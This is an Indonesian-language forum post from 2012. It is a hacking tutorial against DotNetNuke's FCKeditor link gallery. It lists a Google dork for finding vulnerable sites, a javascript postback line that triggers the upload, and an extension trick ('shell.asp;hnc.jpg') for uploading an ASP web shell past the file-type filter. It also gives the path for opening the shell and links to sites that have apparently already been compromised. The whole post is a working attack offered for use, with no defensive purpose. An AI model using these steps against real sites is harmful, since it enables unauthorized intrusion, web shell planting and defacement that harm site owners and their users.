0
comments
|
27 March 2012
hogyz Wrote: waitt all ane nulis di note pad dulu
scan di google
dork :Code:inurl:Fck/fcklinkgallery.aspx
ato dork yang kalian tau
kalo udh dapat korban
pilihCode:File ( A File On Your Site )
nah..
pastekan lah javascript berikutCode:javascript:__doPostBack('ctlURL$cmdUpload','')
dan langsung upload aja...
file yg bisa di upload antara lain :
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
bisa juga upload shell
cara nya kita memanipulasi extensi dr file..
misal mau upload shell
shell.asp
edit aja pake notepad
trz ga usah di otak atik tu shell
langsung save as ajah
dengan nama shell.asp;hnc.jpg
nah.. kalo udah
upload aja tu file
kalo udah buka lah file td diCode:pacth/portals/0/deface.asp;me.jpg
contoh hasil nya
http://fril.co.il/portals/0/ho1onk.txt
maaf kalo kurang memuaskan.. :)
mantab kk...
http://iaf-fai.org/portals/0/oemunix.asp;hnc.css
0 Comments:
Post a Comment
<< Home